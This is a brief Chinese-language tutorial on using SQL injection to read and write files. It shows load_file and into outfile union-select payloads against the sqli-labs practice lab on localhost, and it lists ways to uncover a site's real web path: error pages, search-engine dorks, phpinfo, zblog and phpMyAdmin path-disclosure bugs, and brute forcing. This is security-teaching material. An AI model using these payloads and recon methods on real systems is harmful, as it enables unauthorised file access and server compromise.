SQL注入|文件读写操作

SQL注入文件读写及导出

load_file(): 读取函数

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file('d:/test.txt')

into outfile或into dumpfile:导出函数

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 'this is my test!' into outfile 'd:/test1.txt';

文件读写操作缺点是必须知道文件的具体路径！
以下提供几个常见的获取文件路径方法：

路径获取常见方法：

我们可以通过爆出的真实路径再使用load_file读取文件

报错显示

可以通过工具扫描报错网页(很多都会报出真实路径)
也可以通过搜索引擎搜索：inurl:warning

遗留文件

phpinfo()

漏洞报错

例如使用了zblog搭建了网站，则可以百度zblog爆路径漏洞
例如：百度zblog爆路径\phpadmin爆路径

平台配置文件

linux：/var/www/html
windows: d:/wwwroot/website

爆破等

…